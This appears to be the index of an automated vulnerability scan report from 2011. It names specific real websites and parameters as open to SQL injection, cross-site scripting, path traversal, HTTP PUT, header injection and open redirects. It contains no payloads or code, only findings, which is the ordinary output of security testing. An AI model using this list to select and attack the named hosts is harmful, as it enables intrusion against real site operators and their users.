DORK Report for May 2, 2011, Vulnerable Hosts, GHDB, XSS, SQL Injection, HTTP PUT

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Mon May 02 10:53:10 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://ads2.adbrite.com/v0/ad [zs parameter]

1.2. http://bizinformation.co/www.onlinemicrofiche.com [REST URL parameter 1]

1.3. http://bizinformation.co/www.onlinemicrofiche.com [name of an arbitrarily supplied request parameter]

1.4. http://bizinformation.com/favicon.ico [REST URL parameter 1]

1.5. http://bizinformation.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.6. http://bizinformation.com/images/fl/0.gif [REST URL parameter 1]

1.7. http://bizinformation.com/images/fl/0.gif [REST URL parameter 2]

1.8. http://bizinformation.com/images/fl/0.gif [REST URL parameter 3]

1.9. http://bizinformation.com/images/fl/0.gif [name of an arbitrarily supplied request parameter]

1.10. http://googleads.g.doubleclick.net/pagead/ads [p parameter]

1.11. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 1]

1.12. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 2]

1.13. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

1.14. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

1.15. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 1]

1.16. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 2]

1.17. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 1]

1.18. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 2]

1.19. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 3]

1.20. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 1]

1.21. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 2]

1.22. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 3]

1.23. http://www.japanator.com/favicon.ico [REST URL parameter 1]

1.24. http://www.n1-models.com/favicon.ico [User-Agent HTTP header]

1.25. http://www.ourprayer.org/favicon.ico [User-Agent HTTP header]

1.26. http://www.ourprayer.org/favicon.ico [name of an arbitrarily supplied request parameter]

1.27. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

1.28. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

1.29. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

1.30. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

1.31. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

1.32. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

1.33. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

1.34. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

1.35. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

1.36. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

1.37. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

1.38. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

1.39. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

1.40. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

1.41. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

1.42. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

1.43. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

1.44. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

1.45. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

1.46. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

2. ASP.NET tracing enabled

3. File path traversal

3.1. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]

3.2. http://www.ibegin.com/weather/weather_widget.php [city parameter]

3.3. http://www.ibegin.com/weather/weather_widget.php [country parameter]

3.4. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]

3.5. http://www.ibegin.com/weather/weather_widget.php [state parameter]

3.6. http://www.ibegin.com/weather/weather_widget.php [type parameter]

4. LDAP injection

4.1. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]

4.2. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jobs_search_box.js [REST URL parameter 1]

4.3. http://www.washingtonpost.com/wp-srv/ssi/globalnav/js/channelnavLogo.js [REST URL parameter 1]

5. HTTP PUT enabled

5.1. http://www.onlinemicrofiche.com/favicon.ico

5.2. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp

6. HTTP header injection

6.1. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16 [REST URL parameter 1]

6.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [REST URL parameter 1]

6.3. http://ad.doubleclick.net/adj/wpni.jobs/front [REST URL parameter 1]

6.4. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 2]

6.5. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 4]

6.6. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 5]

7. Cross-site scripting (reflected)

7.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [adurl parameter]

7.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [ai parameter]

7.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [client parameter]

7.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [num parameter]

7.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sig parameter]

7.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sz parameter]

7.7. http://ad.doubleclick.net/adj/wpni.jobs/front [sz parameter]

7.8. http://ad.turn.com/server/pixel.htm [fpid parameter]

7.9. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

7.10. http://admeld.adnxs.com/usersync [admeld_callback parameter]

7.11. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]

7.12. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

7.13. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

7.14. http://ads.adbrite.com/adserver/vdi/711384 [REST URL parameter 3]

7.15. http://ads.adbrite.com/adserver/vdi/711384 [r parameter]

7.16. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]

7.17. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]

7.18. http://ads.adbrite.com/adserver/vdi/806205 [REST URL parameter 3]

7.19. http://ads.adbrite.com/adserver/vdi/806205 [r parameter]

7.20. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

7.21. http://digg.com/tools/diggthis.js [REST URL parameter 1]

7.22. http://digg.com/tools/diggthis.js [REST URL parameter 2]

7.23. http://guru.sitescout.com/tag.jsp [h parameter]

7.24. http://guru.sitescout.com/tag.jsp [pid parameter]

7.25. http://guru.sitescout.com/tag.jsp [w parameter]

7.26. http://hit.blvdstatus.com/t [tid parameter]

7.27. http://insurancenewsnet.com/article.aspx [_TSM_HiddenField_ parameter]

7.28. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

7.29. http://r.turn.com/server/pixel.htm [fpid parameter]

7.30. http://r.turn.com/server/pixel.htm [sp parameter]

7.31. http://s28.sitemeter.com/js/counter.asp [site parameter]

7.32. http://s28.sitemeter.com/js/counter.js [site parameter]

7.33. http://tomopop.com/index-ad-anime.phtml [REST URL parameter 1]

7.34. http://track.blvdstatus.com/js/track.php [name of an arbitrarily supplied request parameter]

7.35. http://track.blvdstatus.com/js/track.php [tid parameter]

7.36. http://usjobsresource.com/3 [s parameter]

7.37. http://usjobsresource.com/3/ [s parameter]

7.38. http://widgets.digg.com/buttons/count [url parameter]

7.39. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [GUID parameter]

7.40. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

7.41. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

7.42. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

7.43. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [WT.srch parameter]

7.44. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [name of an arbitrarily supplied request parameter]

7.45. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]

7.46. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]

7.47. http://www.ibegin.com/weather/weather_widget.php [border_color parameter]

7.48. http://www.ibegin.com/weather/weather_widget.php [border_width parameter]

7.49. http://www.ibegin.com/weather/weather_widget.php [city parameter]

7.50. http://www.ibegin.com/weather/weather_widget.php [color parameter]

7.51. http://www.ibegin.com/weather/weather_widget.php [country parameter]

7.52. http://www.ibegin.com/weather/weather_widget.php [current parameter]

7.53. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]

7.54. http://www.ibegin.com/weather/weather_widget.php [font_size parameter]

7.55. http://www.ibegin.com/weather/weather_widget.php [forecast parameter]

7.56. http://www.ibegin.com/weather/weather_widget.php [padding parameter]

7.57. http://www.ibegin.com/weather/weather_widget.php [showicons parameter]

7.58. http://www.ibegin.com/weather/weather_widget.php [smallicon parameter]

7.59. http://www.ibegin.com/weather/weather_widget.php [state parameter]

7.60. http://www.ibegin.com/weather/weather_widget.php [type parameter]

7.61. http://www.ibegin.com/weather/weather_widget.php [width parameter]

7.62. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 1]

7.63. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 2]

7.64. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

7.65. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

7.66. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

7.67. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

7.68. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 1]

7.69. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 2]

7.70. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 1]

7.71. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 2]

7.72. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 3]

7.73. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 1]

7.74. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 2]

7.75. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 3]

7.76. http://www.japanator.com/favicon.ico [REST URL parameter 1]

7.77. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

7.78. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

7.79. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

7.80. http://www.lenox.com/favicon.ico [REST URL parameter 1]

7.81. http://www.lenox.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.82. http://www.mygiftcardsite.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.83. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

7.84. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

7.85. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

7.86. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

7.87. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

7.88. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

7.89. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

7.90. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

7.91. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

7.92. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

7.93. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

7.94. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

7.95. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

7.96. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

7.97. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

7.98. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

7.99. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

7.100. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

7.101. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

7.102. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

7.103. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

7.104. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

7.105. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

7.106. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

7.107. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

7.108. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

7.109. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

7.110. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

7.111. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

7.112. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

7.113. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

7.114. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

7.115. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

7.116. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

7.117. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

7.118. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

7.119. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

7.120. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

7.121. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

7.122. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

7.123. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

7.124. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

7.125. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

7.126. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

7.127. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

7.128. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

7.129. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

7.130. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

7.131. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

7.132. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

7.133. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

7.134. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

7.135. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

7.136. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

7.137. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

7.138. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

7.139. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

7.140. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

7.141. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

7.142. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

7.143. http://www.seoq.com/webstatshq/www.onlinemicrofiche.com [REST URL parameter 2]

7.144. http://bdv.bidvertiser.com/BidVertiser.dbm [Referer HTTP header]

7.145. http://s28.sitemeter.com/js/counter.asp [IP cookie]

7.146. http://s28.sitemeter.com/js/counter.js [IP cookie]

7.147. http://www.a-m-7.com/favicon.ico [REST URL parameter 1]

7.148. http://www.a-m-7.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.149. http://www.aiu-online.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.150. http://www.aiu-online.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.151. http://www.upmc.edu/favicon.ico [name of an arbitrarily supplied request parameter]

8. Flash cross-domain policy

8.1. http://0.gravatar.com/crossdomain.xml

8.2. http://1.gravatar.com/crossdomain.xml

8.3. http://ad.doubleclick.net/crossdomain.xml

8.4. http://ad.turn.com/crossdomain.xml

8.5. http://admeld.adnxs.com/crossdomain.xml

8.6. http://admonkey.dapper.net/crossdomain.xml

8.7. http://ajax.googleapis.com/crossdomain.xml

8.8. http://b.scorecardresearch.com/crossdomain.xml

8.9. http://bh.contextweb.com/crossdomain.xml

8.10. http://bs.serving-sys.com/crossdomain.xml

8.11. http://c.atdmt.com/crossdomain.xml

8.12. http://cdn.turn.com/crossdomain.xml

8.13. http://d1.openx.org/crossdomain.xml

8.14. http://dg.specificclick.net/crossdomain.xml

8.15. http://ds.serving-sys.com/crossdomain.xml

8.16. http://edge.aperture.displaymarketplace.com/crossdomain.xml

8.17. http://ib.adnxs.com/crossdomain.xml

8.18. http://l.yimg.com/crossdomain.xml

8.19. http://loadm.exelator.com/crossdomain.xml

8.20. http://loadus.exelator.com/crossdomain.xml

8.21. http://log30.doubleverify.com/crossdomain.xml

8.22. http://map.media6degrees.com/crossdomain.xml

8.23. http://metrics.washingtonpost.com/crossdomain.xml

8.24. http://n4403ad.doubleclick.net/crossdomain.xml

8.25. http://pix01.revsci.net/crossdomain.xml

8.26. http://pixel.invitemedia.com/crossdomain.xml

8.27. http://pixel.quantserve.com/crossdomain.xml

8.28. http://r.turn.com/crossdomain.xml

8.29. http://resources.infolinks.com/crossdomain.xml

8.30. http://s0.2mdn.net/crossdomain.xml

8.31. http://segment-pixel.invitemedia.com/crossdomain.xml

8.32. http://t.mookie1.com/crossdomain.xml

8.33. http://tags.bluekai.com/crossdomain.xml

8.34. http://usjobsresource.com/crossdomain.xml

8.35. http://va.px.invitemedia.com/crossdomain.xml

8.36. http://view.atdmt.com/crossdomain.xml

8.37. http://www.4tubehd.com/crossdomain.xml

8.38. http://www.aces.edu/crossdomain.xml

8.39. http://www.architecturaldigest.com/crossdomain.xml

8.40. http://www.babesandstars.com/crossdomain.xml

8.41. http://www.bakugandimensions.com/crossdomain.xml

8.42. http://www.banner.kiev.ua/crossdomain.xml

8.43. http://www.bigrebelgames.com/crossdomain.xml

8.44. http://www.bonhams.com/crossdomain.xml

8.45. http://www.cbs8.com/crossdomain.xml

8.46. http://www.express.co.uk/crossdomain.xml

8.47. http://www.foxytube.com/crossdomain.xml

8.48. http://www.freemooviesonline.com/crossdomain.xml

8.49. http://www.fulltiltpoker.net/crossdomain.xml

8.50. http://www.goodtoknow.co.uk/crossdomain.xml

8.51. http://www.healthination.com/crossdomain.xml

8.52. http://www.hyperlaunch.com/crossdomain.xml

8.53. http://www.jacksonnewspapers.com/crossdomain.xml

8.54. http://www.journalstandard.com/crossdomain.xml

8.55. http://www.ksrevenue.org/crossdomain.xml

8.56. http://www.mountaindew.com/crossdomain.xml

8.57. http://www.muschealth.com/crossdomain.xml

8.58. http://www.outdoorjp.com/crossdomain.xml

8.59. http://www.partyamerica.com/crossdomain.xml

8.60. http://www.pisamba.com/crossdomain.xml

8.61. http://www.thebeatles.com/crossdomain.xml

8.62. http://www.thefordstory.com/crossdomain.xml

8.63. http://www.thehothits.com/crossdomain.xml

8.64. http://www.trilulilu.ro/crossdomain.xml

8.65. http://www.tutorialized.com/crossdomain.xml

8.66. http://www.virtual-hairstyles.com/crossdomain.xml

8.67. http://www.weddings.com/crossdomain.xml

8.68. http://www.wmms.com/crossdomain.xml

8.69. http://www.wsfa.com/crossdomain.xml

8.70. http://www.wtoc.com/crossdomain.xml

8.71. http://adadvisor.net/crossdomain.xml

8.72. http://ads-vrx.adbrite.com/crossdomain.xml

8.73. http://ads.adbrite.com/crossdomain.xml

8.74. http://ads2.adbrite.com/crossdomain.xml

8.75. http://adx.g.doubleclick.net/crossdomain.xml

8.76. http://cookex.amp.yahoo.com/crossdomain.xml

8.77. http://csct.att.com/crossdomain.xml

8.78. http://d.chango.com/crossdomain.xml

8.79. http://geo.yahoo.com/crossdomain.xml

8.80. http://googleads.g.doubleclick.net/crossdomain.xml

8.81. http://media.washingtonpost.com/crossdomain.xml

8.82. http://news.yahoo.com/crossdomain.xml

8.83. http://online.wsj.com/crossdomain.xml

8.84. http://pagead2.googlesyndication.com/crossdomain.xml

8.85. http://pubads.g.doubleclick.net/crossdomain.xml

8.86. http://s28.sitemeter.com/crossdomain.xml

8.87. http://static.ak.facebook.com/crossdomain.xml

8.88. http://tomopop.com/crossdomain.xml

8.89. http://www.admez.com/crossdomain.xml

8.90. http://www.anilinkz.com/crossdomain.xml

8.91. http://www.awltovhc.com/crossdomain.xml

8.92. http://www.bingo.com/crossdomain.xml

8.93. http://www.chrisbrownworld.com/crossdomain.xml

8.94. http://www.cosmeticscop.com/crossdomain.xml

8.95. http://www.dotmed.com/crossdomain.xml

8.96. http://www.facebook.com/crossdomain.xml

8.97. http://www.ftjcfx.com/crossdomain.xml

8.98. http://www.kens5.com/crossdomain.xml

8.99. http://www.lavalife.com/crossdomain.xml

8.100. http://www.lduhtrp.net/crossdomain.xml

8.101. http://www.mihomepaper.com/crossdomain.xml

8.102. http://www.mynews.in/crossdomain.xml

8.103. http://www.nextworth.com/crossdomain.xml

8.104. http://www.swarminteractive.com/crossdomain.xml

8.105. http://www.toyotacertified.com/crossdomain.xml

8.106. http://www.tqlkg.com/crossdomain.xml

8.107. http://www.villagehatshop.com/crossdomain.xml

8.108. http://www.washingtonpost.com/crossdomain.xml

8.109. http://www.whymilk.com/crossdomain.xml

8.110. http://www.wpsdlocal6.com/crossdomain.xml

8.111. http://www.wretch.cc/crossdomain.xml

8.112. http://www.youneek.com/crossdomain.xml

8.113. http://www.argosy.edu/crossdomain.xml

8.114. http://www.babybottlepop.com/crossdomain.xml

8.115. http://www.bluesplayer.co.uk/crossdomain.xml

8.116. http://www.hotwheelscollectors.com/crossdomain.xml

8.117. http://www.mdconsult.com/crossdomain.xml

8.118. http://www.oshkoshbgosh.com/crossdomain.xml

8.119. http://www.ourmidland.com/crossdomain.xml

8.120. http://www.recordslogin.com/crossdomain.xml

8.121. http://www.reelseo.com/crossdomain.xml

8.122. http://www.slotocash.com/crossdomain.xml

8.123. http://www.solidworks.com/crossdomain.xml

8.124. http://www.undisciplined-subs.com/crossdomain.xml

8.125. http://www.uni.edu/crossdomain.xml

8.126. http://www.voiceofsandiego.org/crossdomain.xml

8.127. http://www.walthers.com/crossdomain.xml

9. Silverlight cross-domain policy

9.1. http://ad.doubleclick.net/clientaccesspolicy.xml

9.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

9.3. http://metrics.washingtonpost.com/clientaccesspolicy.xml

9.4. http://n4403ad.doubleclick.net/clientaccesspolicy.xml

9.5. http://s0.2mdn.net/clientaccesspolicy.xml

9.6. http://view.atdmt.com/clientaccesspolicy.xml

10. Cleartext submission of password

10.1. http://insurancenewsnet.com/article.aspx

10.2. http://www.greenhulk.net/forums/login.php

10.3. http://www.greenhulk.net/forums/login.php

10.4. http://www.greenhulk.net/forums/register.php

10.5. http://www.greenhulk.net/forums/register.php

10.6. http://www.greenhulk.net/forums/showthread.php

10.7. http://www.hotwheelscollectors.com/HWCErrorPage.aspx

10.8. http://www.japanator.com/elephant/login.phtml

10.9. http://www.japanator.com/elephant/signup.phtml

10.10. http://www.mrsdash.com/favicon.ico

11. XML injection

11.1. http://loadm.exelator.com/load/ [REST URL parameter 1]

11.2. http://loadus.exelator.com/load/ [REST URL parameter 1]

11.3. http://loadus.exelator.com/load/net.php [REST URL parameter 1]

11.4. http://loadus.exelator.com/load/net.php [REST URL parameter 2]

11.5. http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794 [F cookie]

11.6. http://translate.googleapis.com/translate_a/l [cb parameter]

11.7. http://www.binsearch.info/favicon.ico [REST URL parameter 1]

11.8. http://www.hairyforever.com/favicon.ico [REST URL parameter 1]

11.9. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 1]

11.10. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 2]

11.11. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 3]

11.12. http://www.mangastream.com/favicon.ico [REST URL parameter 1]

11.13. http://www.masalaboard.com/favicon.ico [REST URL parameter 1]

11.14. http://www.myp2p.eu/favicon.ico [REST URL parameter 1]

11.15. http://www.oxfamamerica.org/favicon.ico [REST URL parameter 1]

11.16. http://www.yardmalls.com/favicon.ico [REST URL parameter 1]

12. SSL cookie without secure flag set

12.1. https://www.crankyape.com/member/registration.aspx

12.2. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp

12.3. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp

13. Session token in URL

14. Password field submitted using GET method

15. Open redirection

15.1. http://0.gravatar.com/avatar/8ce02a29142905cdfb140added296ef8 [d parameter]

15.2. http://0.gravatar.com/avatar/a76bb4a499349279e0339b78885213c6 [d parameter]

15.3. http://1.gravatar.com/avatar/31345061262d8fde4fa5256164900115 [d parameter]

15.4. http://admonkey.dapper.net/AdBriteUIDMonster [redirect parameter]

15.5. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

15.6. http://ads.adbrite.com/adserver/vdi/711384 [r parameter]

15.7. http://ads.adbrite.com/adserver/vdi/806205 [r parameter]

15.8. http://bh.contextweb.com/bh/rtset [rurl parameter]

15.9. http://pixel.rubiconproject.com/tap.php [next parameter]

15.10. http://s.ixiaa.com/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif [&redirect parameter]

15.11. http://sync.mathtag.com/sync/img [redir parameter]

16. Cookie scoped to parent domain

16.1. http://t.mookie1.com/t/v1/event

16.2. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/

16.3. http://www.greenhulk.net/forums/archive/index.php/t-126285.html

16.4. http://www.mylearningplan.com/favicon.ico

16.5. http://www.ptcb.org/favicon.ico

16.6. http://www.washingtonpost.com/wl/jobs/home

16.7. http://0.r.msn.com/

16.8. http://a.triggit.com/px

16.9. http://ab-m.d.chango.com/m/ab

16.10. http://ad.turn.com/server/pixel.htm

16.11. http://admeld.adnxs.com/usersync

16.12. http://ads.adbrite.com/adserver/behavioral-data/8201

16.13. http://ads.adbrite.com/adserver/behavioral-data/8204

16.14. http://ads.adbrite.com/adserver/vdi/682865

16.15. http://ads.adbrite.com/adserver/vdi/682865

16.16. http://ads.adbrite.com/adserver/vdi/684339

16.17. http://ads.adbrite.com/adserver/vdi/711384

16.18. http://ads.adbrite.com/adserver/vdi/762701

16.19. http://ads.adbrite.com/adserver/vdi/779045

16.20. http://ads.adbrite.com/adserver/vdi/806205

16.21. http://ads2.adbrite.com/v0/ad

16.22. http://ads2.adbrite.com/v0/ad

16.23. http://ads2.adbrite.com/v0/ad

16.24. http://b.scorecardresearch.com/b

16.25. http://bdv.bidvertiser.com/bidvertiser.dbm

16.26. http://bh.contextweb.com/bh/rtset

16.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.28. http://c.bing.com/c.gif

16.29. http://c.statcounter.com/t.php

16.30. http://clk.atdmt.com/CNT/go/319741851/direct/01/

16.31. http://csc.beap.ad.yieldmanager.net/i

16.32. http://ib.adnxs.com/getuid

16.33. http://image2.pubmatic.com/AdServer/Pug

16.34. http://loadm.exelator.com/load/

16.35. http://loadus.exelator.com/load/

16.36. http://map.media6degrees.com/orbserv/hbpix

16.37. http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692

16.38. http://pix01.revsci.net/J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif

16.39. http://pixel.invitemedia.com/data_sync

16.40. http://pixel.quantserve.com/pixel

16.41. http://pixel.rubiconproject.com/tap.php

16.42. http://r.turn.com/server/pixel.htm

16.43. http://segment-pixel.invitemedia.com/set_partner_uid

16.44. http://sync.mathtag.com/sync/img

16.45. http://tags.bluekai.com/site/2831

16.46. http://tags.bluekai.com/site/2893

16.47. http://tags.bluekai.com/site/3754

16.48. http://tags.bluekai.com/site/3945

16.49. http://um.simpli.fi/ab_match

16.50. http://user.lucidmedia.com/clicksense/user

16.51. http://va.px.invitemedia.com/goog_imp

16.52. http://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php

16.53. http://www.bing.com/

16.54. http://www.bing.com/HPImageArchive.aspx

16.55. http://www.bing.com/fd/fb/r

16.56. http://www.bing.com/fd/fb/u

16.57. http://www.bing.com/fd/ls/l

16.58. http://www.bing.com/scopePopupHandler.aspx

16.59. http://www.dirtrider.com/favicon.ico

16.60. http://www.greenhulk.net/forums/login.php

16.61. http://www.greenhulk.net/forums/register.php

16.62. http://www.kylotteryretailers.com/favicon.ico

16.63. http://www.schwabbankcreditcard.com/favicon.ico

17. Cookie without HttpOnly flag set

17.1. http://dg.specificclick.net/

